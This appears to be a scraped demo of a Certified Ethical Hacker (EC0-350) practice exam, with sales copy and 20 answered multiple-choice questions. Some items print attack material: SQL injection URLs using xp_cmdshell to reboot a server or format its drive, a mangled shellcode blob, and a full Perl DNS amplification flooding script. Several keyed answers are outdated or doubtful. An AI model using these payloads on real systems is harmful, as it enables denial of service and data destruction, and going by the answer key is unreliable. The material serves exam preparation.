EC0-350 Certified Ethical Hacker EC-COUNCIL Ethical Hacking and Countermeasures

You might also like

Download as pdf or txt
Download as pdf or txt
You are on page 1of 7

TestInside EC-COUNCIL EC0-350 Certified Ethical Hacker Certification

EC0-350 Certified Ethical Hacker


EC-COUNCIL ethical hacking and countermeasures

Practice Exam: EC0-350 Exams


Exam Number/Code: EC0-350
Exam Name: ethical hacking and countermeasures
Questions and Answers: 339 Q&As
( Certified Ethical Hacker )

"ethical hacking and countermeasures", also known as EC0-350 exam, is a


EC-COUNCIL certification.With the complete collection of questions and E x a m : EC0-350
answers, TestInside has assembled to take you through 339 Q&As to your
EC0-350 Exam preparation. In the EC0-350 exam resources, you will cover every field and category in EC-COUNCIL
Certification helping to ready you for your successful EC-COUNCIL Certification.

Quality and Value for the EC0-350 Exam TestInside Practice Exams for EC-COUNCIL Certified Ethical Hacker
Certification EC0-350 are written to the highest standards of technical accuracy, using only certified subject matter
experts and published authors for development.

TestInside provide the professional Q&A.

1. We offer free update service for three month.


After you purchase our product, we will offer free update in time for three month.

2. High quality and Value for the EC0-350 Exam.


EC0-350 simulation test questions, including the examination question and the answer, complete by our senior IT
lecturers and the Certified Ethical Hacker product experts, included the current newest EC0-350 examination
questions.

3. 100% Guarantee to Pass Your Certified Ethical Hacker exam and get your Certified Ethical Hacker Certification.
If you do not pass the EC-COUNCIL Certification EC0-350 exam (ethical hacking and countermeasures) on your first
attempt using our TestInside testing engine and pdf file, we will give you a FULL REFUND of your purchasing fee.

use TestInside EC0-350 Q&A ensure you pass the exam at your first try.

TestInside professional provide Certified Ethical Hacker EC0-350 the newest Q&A, completely covers EC0-350 test
original topic. With our complete Certified Ethical Hacker resources, you will minimize your Certified Ethical Hacker
cost and be ready to pass your EC0-350 tests on Your First Try, 100% Money Back Guarantee included!

EC-COUNCIL EC0-350 Test belongs to one of the Certified Ethical Hacker certified test, if needs to obtain the
Certified Ethical Hacker certificate, you also need to participate in other related test, the details you may visit the
Certified Ethical Hacker certified topic, in there, you will see all related Certified Ethical Hacker certified subject of
examination.

TestInside Testing Engine Features

Comprehensive questions and answers about EC0-350 exam


EC0-350 exam questions accompanied by exhibits
Verified Answers Researched by Industry Experts and almost 100% correct
EC0-350 exam questions updated on regular basis

Same type as the certification exams, EC0-350 exam preparation is in multiple-choice questions (MCQs).
Tested by multiple times before publishing

Try free EC0-350 exam demo before you decide to buy it in Test-Inside.com.
Note:This pdf demo do not include the question's picture.

Exam : EC-Council EC0-350


Title : Ethical Hacking and Countermeasures

1. What does this symbol mean?


A. Open access point
B. WPA encrypted access point
C. WEP encrypted access point
D. Closed access point
Answer: A

2. Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for
securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are
projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of
the potential for financial loss. Bob has asked his companys firewall administrator to set the firewall to inspect all
incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be
possible?
A. Firewalls cannot inspect traffic coming through port 443
B. Firewalls can only inspect outbound traffic
C. Firewalls cannot inspect traffic coming through port 80
D. Firewalls cannot inspect traffic at all, they can only block or allow certain ports
Answer: D

3. Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some
information about the target they are attempting to penetrate. How would you call this type of activity?
A. Scanning
B. CI Gathering
C. Dumpster Diving
D. Garbage Scooping
Answer: C

4. What hacking attack is challenge/response authentication used to prevent?


A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Answer: A

5. You are conducting pen-test against a companys website using SQL Injection techniques. You enter "anything' or
1=1 ? in the username field of an authentication form. This is the output returned from the server.
What is the next step to be done?
A. Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --
B. Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
C. Delete the database and format the C: drive by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB; xp_cmdshell 'format
c: /q /yes '; --
D. Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name
FROM sysobjects WHERE xtype='U'),1))) > 109
Answer: B

6. while attempting to discover the remote operating system on the target computer, you receive the following results
from an nmap scan:
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
Port State Service
21/tcp open ftp
25/tcp open smtp
53/tcp closed domain
80/tcp open http
443/tcp open http
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds
What would you do next to fingerprint the OS?
A. Run an nmap scan with the -vv option
B. Perform a tcp traceroute to the system using port 53
C. Perform a Firewalk with that system as the target IP
D. Connect to the active services and review the banner information
Answer: D

7. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an
ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target
network. How would you search for these posting using Google search?
A. Search in Google using the key search strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
Answer: B

8. The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.
The law states:
Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an
offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or
data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the
access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal
with common-or-garden hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further
offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the
intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than
five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further
offence, the Section 1 offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means the creation and
distribution of viruses. For a conviction to succeed there must have been the intent to cause the modification, and
knowledge that the modification had not been authorized.
What is this law called?
A. Computer Misuse Act 1990
B. Computer Incident Act 2000
C. Cyber Crime Law Act 2003
D. Cyber Space Crime Act 1995
Answer: A

9. Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to
get from the client before commencing his test?
A. Only the IP address range
B. Nothing but corporate name
C. All that is available from the client
D. IP Range, OS, and patches installed
Answer: B

10. You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few
Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in
footprinting the organization?
A. The IP range used by the target network
B. How strong the corporate security policy is
C. The types of operating systems and applications being used
D. An understanding of the number of employees in the company
Answer: C

11. Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to
increase his privileges by escalating the compromised account to one having increased privileges, such as that of an
administrator. What would be the best countermeasure to protect against such escalation?
A. Give users tokens
B. Give users two passwords
C. Give users a strong policy document
D. Give user the least amount of privileges
Answer: D

12. Travis works primarily from home as a medical transcriptionist. He just bought a brand new Dual Core Pentium
computer with over 3 GB of RAM. He uses voice recognition software to help him transfer what he dictates to
electronic documents. The voice recognition software is processor intensive, which is why he bought the new
computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months
of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus
software, anti-spyware software, and always keeps the computer up-to-date with Microsoft patches.After another
month of working on the computer, Travis?computer is even more noticeably slow. Every once in awhile, Travis also
notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even
when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on
it, and he depends on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of
the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder by folder, to see if
there is anything he can find. He spends over four hours pouring over the files and folders and cannot find anything.
But, before he gives up, he notices that his computer only has about 10 GB of free space available. Since his hard
drive is a 200 GB hard drive, Travis thinks this is very odd. ?
Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his
calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travis?problems?
A. Traviss computer is infected with stealth kernel level rootkit
B. Traviss computer is infected with Stealth Trojan Virus
C. Traviss computer is infected with Self-Replication Worm that fills the hard disk space
D. Logic Bomb is triggered at random times creating hidden data consuming junk files
Answer: A

13. Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system.
Which TCP and UDP ports must you filter to check null sessions on your network?
A. 137 and 139
B. 137 and 443
C. 139 and 443
D. 139 and 445
Answer: D

14. Jess the hacker runs L0phtCrack's built-in sniffer utility that grabs SMB password hashes and stores them for
offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user
account has access to. But Jess is not picking up hashes from the network. Why?
A. The physical network wire is on fibre optic cable
B. The network protocol is configured to use IPSEC
C. The network protocol is configured to use SMB Signing
D. L0phtCrack SMB sniffing only works through Switches and not Hubs
Answer: C

15. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the
password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A

16. Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a
breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers." The
hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears
Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears
Technology was looking to law enforcement officials to protect their intellectual property.
How did this attack occur? The intruder entered through an employees home machine, which was connected to
Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a
"back door" allowing the hackers undetected access. The security breach was discovered when customers
complained about the usage of their credit cards without their knowledge.
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent
to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a
remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system
and "hold it hostage" from Spears Technology, in exchange for ransom.
The hackers had intended on selling the stolen VOIP software source code to competitors.
How would you prevent such attacks from occurring in the future at Spears Technology?
A. Disable VPN access to all your employees from home machines
B. Allow VPN access but replace the standard authentication with biometric authentication
C. Replace the VPN access with dial-up modem access to the companys network
D. Enable 25 character complex password policy for employees to access the VPN network
Answer: A

17. while investigating a claim of a user downloading illegal material, the investigator goes through the files on the
suspects workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"xEBxFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"
"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"
"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"
"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"
"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"
"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"
"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"
"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"
"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"
"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"
"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"
"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"
"x67x6cx69x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
What can he infer from this file?
A. An encrypted file
B. A uuencoded file
C. A buffer overflow
D. A picture that has been renamed with a .txt extension
Answer: C

18. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000
server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated
permissions. You need to know what your privileges are within the shell. What are your current privileges?
A. LocalSystem
B. Administrator
C. IUSR_COMPUTERNAME
D. IIS default installation account
Answer: A

19. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will
be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network
address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines,
which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid
role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users
from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times
larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq '') {
print "Usage: ./hackme.pl <target IP> <loop count>n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest
=> 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS reverse connection attacks
D. DNS forward lookup attacks
Answer: A

20. What is the most common vehicle for social engineering attacks?
A. Email
B. Direct in person
C. Local Area Networks
D. Peer to Peer networks
Answer: B

More EC0-350 Information

Related EC0-350 Exams


EC0-350 ethical hacking and countermeasures

312-49 Computer Hacking Forensic Investigator

312-50 Ethical Hacking and Countermeasures (CEHv6)

EC0-349 Computer Hacking Forensic Investigator

Other EC-COUNCIL Exams

312-49 EC0-232 312-50 EC0-350 412-79 EC0-349 EC0-479

You might also like